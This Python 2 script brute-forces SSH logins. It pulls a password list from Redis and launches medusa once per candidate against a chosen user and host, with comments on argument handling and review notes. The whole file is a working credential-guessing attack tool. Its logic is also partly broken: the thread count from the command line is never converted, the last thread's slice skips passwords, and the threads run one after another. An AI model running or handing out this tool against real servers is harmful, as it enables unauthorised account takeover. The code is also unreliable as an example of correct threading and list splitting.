# -*- coding:UTF-8 -*-#
"""
Brute-force password guessing driven by a password dictionary stored in Redis.
"""
import redis
import sys,os
import threading
# Absolute path of the medusa binary that threadTask() launches.
BIN="/usr/local/bin/medusa"
# Shape of the command run per candidate: medusa -u <user> -p <password> -h <host> -M ssh
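def threadTask(plist,threadnum):
    """Run medusa's ssh module once for each candidate password in *plist*.

    Args:
        plist: candidate passwords assigned to this worker.
        threadnum: worker index; only used in the progress line.

    Reads the module-level names BIN, User and Host, which the __main__
    block assigns before it starts any worker.
    """
    # Function-scope import keeps this block independent of the file's
    # top-level import lines.
    import subprocess

    for xval in plist:
        # The progress line echoes the candidate, so captured stdout holds
        # every password that was tried.
        print("Thread-%s:%s" % (threadnum,xval))
        # Argument list, no shell. Built as one shell command string, a quote,
        # backtick or $(...) inside a Redis entry (or inside the -u/-h values)
        # would be interpreted as shell syntax on the host running this script.
        # The candidate still appears in medusa's argv, i.e. in process listings.
        argv=[BIN,"-u",User,"-p",xval,"-h",Host,"-M","ssh"]
        try:
            subprocess.call(argv)
        except OSError as err:
            # BIN is missing or not executable; later attempts would fail the
            # same way, so stop this worker instead of repeating the error.
            sys.stderr.write("cannot run %s: %s\n" % (BIN,err))
            break
    # Raises SystemExit inside this worker thread only; the threading module
    # discards it, so the main thread keeps running.
    sys.exit(0)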
if __name__=='__main__':
    # Entry point: parse the command line, read the password list from a local
    # Redis list, then pass slices of it to worker threads running threadTask().
    # The print statements and xrange below mean this file targets Python 2.

    # Redundant at module scope: Host and User assigned below are already
    # module globals, which is how threadTask() sees them.
    global Host,User
    numThread=10 #default: 10 threads
    # The string 'None' (not the None object) marks "option not supplied".
    Rkey='None'
    Host='None'
    User='root'
    # No arguments at all: print the usage text and stop.
    if not sys.argv[1:]:
        print "Usage python %s [OPTIONS]" % sys.argv[0]
        print "Options are:"
        print "-n, -number Number of threads,default:10"
        print "-k, -key Redis's key"
        print "-u, -user system's needed to crack,default:root"
        print "-h, -host server ip"
        sys.exit(0)
    # Hand-rolled option scan: each recognised flag consumes the next argv item
    # as its value. NOTE(review): i is advanced without checking that a value
    # actually follows the flag.
    i=1
    while (i<len(sys.argv)):
        arg=sys.argv[i]
        if arg=='-n' or arg=='-number':
            i+=1
            # NOTE(review): stored as the str taken from sys.argv; nothing
            # converts it to int before xrange() and the arithmetic below.
            numThread=sys.argv[i]
        elif arg=='-k' or arg=='-key':
            i+=1
            Rkey=sys.argv[i]
        elif arg=='-u' or arg=='-user':
            i+=1
            User=sys.argv[i]
        elif arg=='-h' or arg=='-host':
            i+=1
            Host=sys.argv[i]
        else:
            # Unrecognised arguments are ignored.
            pass
        i+=1
    # The Redis key and the host are mandatory; both failures exit with status 0.
    if Rkey=='None':
        print "Please input key value!"
        sys.exit(0)
    if Host=='None':
        print "Please input Host IP!"
        sys.exit(0)
    # Redis on localhost:6379, database 0; no password argument is passed.
    rds = redis.Redis(host='localhost',port=6379,db=0)
    # List entries go to threadTask() as-is, with no validation, so whoever can
    # write to this key controls what threadTask() hands to medusa.
    pList=rds.lrange(Rkey,0,-1)#password dictionary: all elements of the list at Rkey
    totalNum = len(pList) #total number of passwords
    for threadNum in xrange(numThread):
        #number of passwords handled by each thread (integer division in Python 2)
        dealNum=totalNum/numThread
        #remainder left over after the even split
        leftNum=totalNum%numThread
        if threadNum!=(numThread-1):
            #instantiate the thread with a dealNum-item slice
            t=threading.Thread(target=threadTask,args=(pList[threadNum*dealNum:threadNum*dealNum+dealNum],threadNum))
            t.start()#start the thread
            t.join()#block until this worker has finished
        else:
            #last worker: slice of leftNum items starting at threadNum*dealNum
            t=threading.Thread(target=threadTask,args=(pList[threadNum*dealNum:threadNum*dealNum+leftNum],threadNum))
            t.start()#start the thread
            t.join()#block until this worker has finished